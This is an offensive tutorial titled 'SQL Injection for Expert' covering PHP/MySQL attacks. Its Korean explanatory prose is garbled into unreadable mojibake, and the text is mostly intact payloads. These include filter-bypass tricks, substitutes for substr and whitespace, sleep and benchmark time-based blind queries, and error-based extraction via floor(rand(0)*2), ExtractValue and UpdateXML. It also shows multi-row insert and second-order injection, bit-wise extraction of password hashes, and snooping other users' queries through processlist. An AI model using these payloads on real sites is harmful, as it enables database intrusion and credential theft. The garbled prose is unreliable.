SQL Injection for Expert
ۼ : rubiya

SQL Injection for Expert


*  ۼǾ°?
* SQL Injection Filter Bypass
* , Array SQL Injection
* Error Based SQL Injection
* Error Based Blind SQL Injection
* Indirect SQL Injection
* Efficient Blind SQL Injection
* SQL Injection with information schema.processlist

[*]  ۼǾ°?

LeaveRet Ҽ rubiya ȭ SQL injection ⸦ ϴ Ŀ, ڵ ؼ ۼߴ.

PHP, Mysql ȯ濡 SQL Injection ݿ ˷ Ŀ ؼ ٷ̴.

rubiya805[at]gmail.com ׿ ִ.

[*] SQL Injection Filter Bypass

κ ڵ SQL Injection κ ڽ Ʈ ȣϱ ̱͸ µ ٺ  õѴ.
׷ Ű带 ͸Ұ찡 ϴµ, ̴ κ ¼ҽ ߰ų ȭ ġ ̴.
̷ 쿡  ͸ ȸؾ ϴ ؼ ϰڴ.

鹮ڸ ͸ 쿡 %09, %0a, %0b, %0c, %0d, %a0, /**/ ؼ 鹮ڸ ü ִ.

̷ Ű 쿡 () ִ.

select * from table select(*)from(table) ̶ ϴٴ ̴.

#, -- ּ ͸ Ǿ 쿡 ;%00, /* Ҽ ִ. (Nullڴ magic_quotes_gpc )

̱Ͱ ڿ 0x, 0b ؼ 2, 16 ġȯν ȯ濡 x, b ص ȴ.

select x'61' = 'a'

Ʒó 0x, 0b 36 ص ȴ.

select conv(10,10,36)='A'

Ʒó ϴ ִ.

select substr(monthname(from_unixtime(1)),2,1)='a' // monthname(from_unixtime(1)) = 'January'

ڸ 쿡 auto type cast ؼ ȸѴ.

false = 0
true = 1
true+true = 2
floor(version()) = 5

Ϲ SQL Injection Ұ 쿡 Blind SQL Injection ؾ Ѵ.

Blind SQL Injection ϱ ؼ ڸ ߶󳻴 Ǿ ϴµ ⼭ substr Լ ͸ 찡 ִ.

޸ ͸ 쿡 select substr('asdf' from 1 for 1)='a' Ѵ.

Լ ü ͸ 쿡 substring Լ üҼ ִ.

׷ substring Լ substr ڿ ⿡ [substr(] ܾ ͸ ʴ̻ substr Լ Բ ͸ Ȯ .

׷ like ϵī带 ؼ Ʒó ȸ ִ.

select id from member where id like 'a%'
select id from member where id like 'b%'
select id from member where id like 'c%'

% ڿ ڰ ʰ select ִ ϴ ϵī̱⿡ ̷ ̴.

ù° ڸ ˾Ƴ Ŀ Ʒ ó ڿ ѱھ ָ߰ ȴ.

select id from member where id like 'ca%'
select id from member where id like 'cb%'
select id from member where id like 'cc%'

ϵī带 Ҷ cat, camel, camera ó Ͱ ÿ select 찡 ͽ÷ ۼҶ ؾ Ѵ.

like ͸ ߴٸ left Լ right Լ  ν ȸ ϴ.

Լ 1° ڷ , κ 2° ڷ ŭ ߶󳻴 Լ̴.

̸ ȥؼ Ʒ ó substr Լ ִ ̴.

select right(left('asd',1),1) = 'a'
select right(left('asd',2),1) = 's'
select right(left('asd',3),1) = 'd'

͸ ɷ Ʒ .

select mid('asd',1,1) = 'a'
select lpad('asd',1,space(1)) = 'a'
select rpad('asd',1,space(1)) = 'a'
select reverse(right(reverse('asd'),1)) = 'a'
select insert(insert('asd',1,0,space(0)),2,222,space(0)) = 'a'

concat Լ select 'a' 's' 'd' 'f'='asdf' ̷ ִ.

if Լ case(), ifnull(), nullif() ִ.

ex) select case when 1=1 then sleep(1) else 1 end

sleep Լ 쿡 benchmark() Լ ؼ select benchmark(1000000,MD5(CHAR(118))) ̷ ݺ ؼ ð ų ִ.

Ȥ select (select count(*) from information_schema.columns A, information_schema.columns B, information_schema.columns C) ̷ ð ɸ ν Ҽ ִ.

ٸ ϴµ ɸ ð ұĢ̶ ؾѴ.

[*] , Array SQL Injection

php.ini Ͽ magic_quotes_gpc = on صθ Ŭ̾Ʈ Ϳ ̱ տ 齽ø ٿش.

̴ SQL Injection ϴµ ū ɸ ǰ Ѵ.

׷ magic_quotes_gpc GET, POST, COOKIE ƿ ȴ.

magic_quotes_gpc ϰ , Array ͺ̽ Ժη ڴ 츮 հ̴.

̸׸ insert into uploadfile values('filename','path') 쿡 filename ſ


insert into uploadfile values('asdf','fdsa'),(version(),'1234'),('asdf','path') ̷ ۵ ִ ̴.

insert insert into table values('asdf',1),('fdsa',2),('zxc',3) ̷ ÿ ִٴ ٸ ȸ ˾Ƶ.

[*] Error Based SQL Injection

޼ ϴ SQL Injection ޼ ִ ȯ濡

ѹ ϴ ͸ ѹ ֱ α׵ Գ ϴµ ҿǴ ð Ǽ Blind SQL Injection ϰ .

SQLi mssql ȯ濡 ϴ.

ٸ ϰԵǸ ٰ ޼ ѹ վֱ ̴.


select * from table where 'asdf'=123

̶ 쿡

['asdf' int ϴ!]

޼ .

׷ mysql auto type cast ֱ ٸ ص ƹ .

ϴ ޼ ѹ ؼ

select sum(5),concat(version(),floor(rand(0)*2))as a from information_schema.tables group by a

̷ ؾѴ.

Ű带 ְ Ű ؼ ̴.

Ʒ  ̴.

select * from (select name_const(version(),1),name_const(version(),1))a

select * from table where 1=1 and ExtractValue(1,concat(0x01,version()))

select * from table where 1=1 and UpdateXML(1,concat(0x01,version()),1)

select * from table where (@:=1)or@ group by concat(@@version,@:=!@)having@||min(0)

ȯ濡 ° .

[*] Error Based Blind SQL Injection

Ȳ 幮 ݱ ˾Ƶּ ܰ 丸 ˾Ƶ.

select * from table where 1 and if(1=1,1,(select 1 union select 2))

select * from table where 1 and if(1=2,1,(select 1 union select 2))

ù° if 1=1 Ǹ鼭 ܼ 1 ȯѴ.

ι° if Ǹ鼭 select 1 union select 2 ϰ ǰ,

ȯϸ鼭 ߻ϰ ȴ. (thx to hellsonic)

[*] Indirect SQL Injection

insert into member where values('guest','123','qwe') ִٰ غ.

[guest'] Էϸ php ܿ [guest\'] Ŀ mysql ν ġ ϵ ̴.

׷ mysql ȸϸ ( ݸ غ 翬ϰԵ) [guest'] ִ.

[guest'] α Ѵٸ ̵ [guest'] ȴ.

⼭ α׸ ٴ ϴ ൿ ̵ ִ ڵ尡 ִٸ?

̹ [guest'] ġ ȴ.

php.ini magic_quotes_runtime ɼ off ϶ ϴ. (thx to dmbs335@LeaveRet)

[*] Efficient Blind SQL Injection

Blind SQL Injection 쿡 ڸ ˾Ƴ 90ȸ Ѵ. (ƽŰ 32~127)

׷ ȿ ۼϸ ڴ 7ȸ ϴ.

ڸ 10 ȯְ ٽ 2 ȯ Ŀ lpad Լ 7ڷ ָ ȴ.

̷ε Ʒ .

select substr(lpad(bin(ascii(substr('asdf',1,1))),7,0),1,1)

˾Ƴϴ md5 hash 16 ̶ Ȯ ִٸ Ʒ ؼ ڴ 4ȸ ȿ̰ ϴ.

select substr(lpad(bin(if(ascii(substring(pw,1,1))<90,ascii(substring(pw,1,1))-48,ascii(substring(pw,1,1))-87)),4,0),1,1)

[*] SQL Injection with information schema.processlist

Ʈ SQL Injection Ҷ information schema.tables ̺ ̺  ̺ ϴ ִ ˱Ⱑ .

ᱹ ̸ ̺ ȫӿ شҼ ִ.

̷ information schema.processlist ̺ ؼ ϴ ִ ̺ ã ִ.

information schema.processlist ̺ صΰ ִ.

̷ select info from information_schema.processlist ؼ , غ ʾ ̽ ϵ ݺ õϸ ٸ ڰ ȸ Ұ̴.

ٸ ڰ α϶ 츮 ش ȸϴµ ߴٸ ȸ ִ Į ̺ ѹ ִ°̴.

[+] ħ

ο ϴ ſ ۰Գ Ǿ⸦ ٶ ģ.





